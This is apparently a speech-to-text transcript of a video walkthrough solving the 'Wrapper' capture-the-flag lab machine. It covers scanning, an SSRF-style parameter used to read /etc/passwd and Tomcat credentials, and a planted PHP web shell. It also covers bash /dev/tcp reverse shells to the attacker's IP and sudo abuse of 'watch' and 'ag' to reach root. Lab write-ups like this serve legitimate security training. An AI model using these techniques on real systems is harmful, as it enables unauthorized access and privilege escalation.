Hello guys, welcome back to Apprentices Club. Today we're going to solve another CTF challenge name called a Wrapper. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So now first open the terminal. So first we just type your sudo su, enter your password, then later you just type your net discover minus I is 0. So I have identified here my target machine here. Then you just type it as nmap minus 34 minus a and aggressive scan and enter your target IP address. Now let's wait for the nmap result. So we have got the nmap result. One is available with SH, another one is available with port 8. Now we just try here as with the directory buster. Then enter your target IP address 192. Then later we would like to go with as a nicto minus hatch this TP. Enter your target IP address 182. Now we would like to visit to the port 80. Just enter your target IP address 192.168.18.182. So it shows a try harder. Okay, we would like to try the harder. So in this case we not get any useful information. Now I would like to go with as a go directory minus u. Then let's just paste it here 192.168.18.182. word list is user share word list, then directory master, then a directory list 2.3 medium.txt. That's it. Now we would like to wait what else the useful information we can get here. Now I have got one is with as a advanced search. Let's just copy this one, come back here. Now we would like to look here. Welcome to the private search. Here you will able to find able to load any page you want. You won't have to worry about you are revealing the IP address. Quite interesting. Let's just close this. So we would like to look the page source. In the page source from it's like a get method where the parameter is like a path.php and parameter ID is path. And once you submit, you can get it here. Okay, quite interesting. Let's come back here. Now, this is identified. Let me just type here as clear. Now, just type here as action minus u http at your target. Type address 182.168.18.182. Advanced search. Then path.php. We would like to try to identify. We not get any type of discovered. If this is not discovered, let me just type here as clear. Just go with as wz puts. Then minus c, we just put here as minus hw equal to 0 minus t1 minus jet. I would like to prefer a range from 1 to 655 35. All the ports I would like to get from here. Now let's just paste this. Now a path.php and where a parameter ID equal to a path. Then in the path of the parameter ID equal to, I would like to give here as a local host to try to foods this. That's it. Now I have got a port 22 or port 8. Quite interesting. Here we would like to try to go here as try here as a local host 22, where you can look here as such. Quite interesting. Go back. Now port 80, it's also a try harder. Quite interesting here. Now This may take more and lengthy time process to process all these things. So I just keep it this tab as it is. Now let's come back here. I would like to try here as a 655 65300, where you can look here, it works. So it's like how where lib with the Tomcat web with the root with the index.html. Now, for a security reasons, using a manager with a web app is restricted with the user's roles with the manager UI. The host manager web app is restricted to the users with the role with the admin GUI user. Where you can look here, we can also read this type of files also in this. So just copy, come back here. Now, for a reading a file, let me just close this. So I just utilize a file. Let me just put here as etc password. Let's look here. I have got it here as a etc password. Let's look here. In the EDC password, one is with a Tomcat, quite interesting, where we have got a Tomcat that users XML store. One is with Henry, another one is Edward. Quite interesting. Come back here. Close this. Now just press this. Enter. Let's look the view page source. Where I have got it here. Username with Edward, password is this one. Okay, quite interesting. Come back. Now let me just type here as clear. You just type here as a as such Edward, enter your target right here as 192.168.18.182. Then let's come back here. This is the password. Just copy, come back, paste. Now, you just type here as I, we have got it here. You just type listener as L, we have got it here. You just type here as cat, a user.txt. Quite interesting here. So we have identified the user flag here. Now, what we would like to try to find here. Now, we would like to try to find here. Now, I would like to try here as a find minus PRF minus 4000 2 is greater than dev or null. We would like to wait here. Now, where it's like open a search or something. Now, we would like to go to here as Siri, where www HTML. Let me just type it as clear list. Where we have got this. Go to here as a advanced search list minus L cat index.php. Quite interesting. Cat path.php. So where it have this minus L hatch, it may have read and write permission. So we can try to create one file here. We would like to try to give here as we would like to try to here try to create come back here. I just put here as none a shell.php. In this case, let me just put here as PHP. Now let's just put here as a system. Then just put here as $_get cmd. That's it. Now let's just close this, type Ctrl O, Ctrl X. That's it here. Now, where we have seen this one as a shell.php, where in our advanced search, we have here as a shell.php. Quite interesting. Now, I would like to try to here. So it may be a quitting here. Let me just type here as clear. Now let I just utilize here as netcat minus lvnp 9740. Now let's come back here. We would like to utilize here as a pentest monkey. Let's go to here as pentest monkey. Now we would like to try here as shell.php command equal to cmd equal to I just try here as AID where I'm getting here as www.data. Okay, quite interesting. Now let's go back here as a pentest monkey. In this pentest monkey, click on cheat sheet. Now click on this reversal cheat sheet. Now just take it this. Copy. Now I would like to put here. Let me just put here as bash minus c. Then let's just press this off. That's it. In this case, I just put here and here. Now, in this case, you just need to change your target type here as 192.163.18.122. Here is 9740. That's it. Just copy, come back here. We just press it here. That's it. I think we not get anything else from here. I would like to try to cut this. We just type here as who am I? We are getting here. We just type here as a which netcat. We have got it here as. We just put here as URL encode. We would like to try to encode this one. Come back. Let's just press this. Try to encode. That's it here. Copy. Come back here. Now put it here. Try here. Where we have got it here. Exactly. We just try here as who am I? We have got it here. Now just type here as ID. We have got it here. Now just type here as sudo minus L. Where you can look here as watch. Now we would like to go to here as come back. Here just there as GDFO bins. Quite interesting. Now walk to this GDFO bins. Let's just try here as a watch. So let's search this as sudo. We would like to utilize as utilizing as sudo minus u for a Henry. I can write here. So we want to log into Henry. Sudo minus u Henry. Then let's come back here. Watch minus sx. This command. So just copy, come back, and paste. That's it here. So we have reset with the exec. That's it. So it not taking to Henry also. So it shows a service is unknown. So how we would like to try to get it out here. So we just came here very clearly. Okay. In this case, I just put here, no, sorry. We just need to type here as sudo minus u Henry. Now I just put here as user bin what from here just put here watch error terminal is unknown. So quite interesting here. I can try in this case. So let me just copy, come back, let's just paste here. Enter our password for Edward. Password for Edward. Just copy. Come back here. Let's just paste it. Edward is not the sudo user file. This instance will be reported. Quite interesting here. So let me just come back here. Let me just type here as export a term equal to x term. Let me just type here as here sudo minus l. So for Henry is no password, user will watch. Quite interesting here. Now let's go back. Cheat sheet. Okay, CTF bins. So I think let me just put here as watch minus help. Okay, it's working here. Now let I just type here as sudo minus u is Henry. I think we just need to get it out of this one. I can try as manual user bin watch minus x as a bash minus c. Then I just put here as a reset exec. Then bash 1 is greater than and 0 and 2 is greater than and 0. That's it. Now you just type ID. I came to Henry right now. Done. So sometimes in the GTFO builds, you just need to try it manually. Then only it will be work out. So now you just type it as which Python you have got here. I just type it as Python minus C. Put here as a import as pdy span bin bash. So where I have came to here as Henry. Now I just put here as cd home list minus l cd Henry list minus l. There is nothing else from here as in the Henry. Now it's utilized as the same to go to as now. I would like to try here as sudo minus l. It's with ag. Now let's go to here as come back. So this is watch is gone. Now just put here as aag. So I think how we would like to try to exploit this one. We can also try as a somewhat to read as a root flag. I would like to try to here as clear. Just type here as sudo minus u as a root. Then user bin ag. Then c for as a root. Then a root dot txt. Unable to get root this one. Quite interesting here. So unable to resolve the host. Quite interesting here. If this is unable to resolve, now let's I would like to try to make as a another trick. We would like to utilize same the netcat listener. Let's come back here. We would like to utilize here as netcat minus lvnp 1377. Now let's come back here. In this tab we just let me just type here as clear. You just put here as sudo minus u for a root. Just put here as user bin ag. Then just utilize here as a pager. Then let's just we have already this one bin bash. Oh, sorry, we would like to utilize here as a bin bash. It will not go as backside. So I would like to try to uh, do a normal that bin bash minus I is greater than and dev TCP. Enter your IP address 1337. Then 0 is greater than and 1. Then that's it here. Quite interesting. Now we just try here enter. Connection is refused in this case. Okay. Okay. If connection is refused, just copy, cut it here. Now, I also cut this one. Now, try to enter only this one. Enter, connection is refused. This is quite interesting here. So, I can try here as, let me just type here as here, 1, 2, 3, 4. Now, let me just come back. Utilizing this as 1, 2, 3, 4. Now, just copy, come back here. Let's just paste here. Sudo minus q to go for a root user bin ag with the pager. Then once you go with the bin bash, then again with the bin bash minus I is greater than R. Let me just try here. Okay, quite interesting. What do you want to search for? Okay. Now I have get a connected to the root where you can look here. No job control in the background for a file description. So quite interesting. Sometimes the port may not be allowed everything. You just type ID, you are getting here as a root. CD a root. This one is a, you just type it as cat a root dot tx. We have identified the root line. That's it. So you try it your own guys. Thank you guys for watching and keep smiling.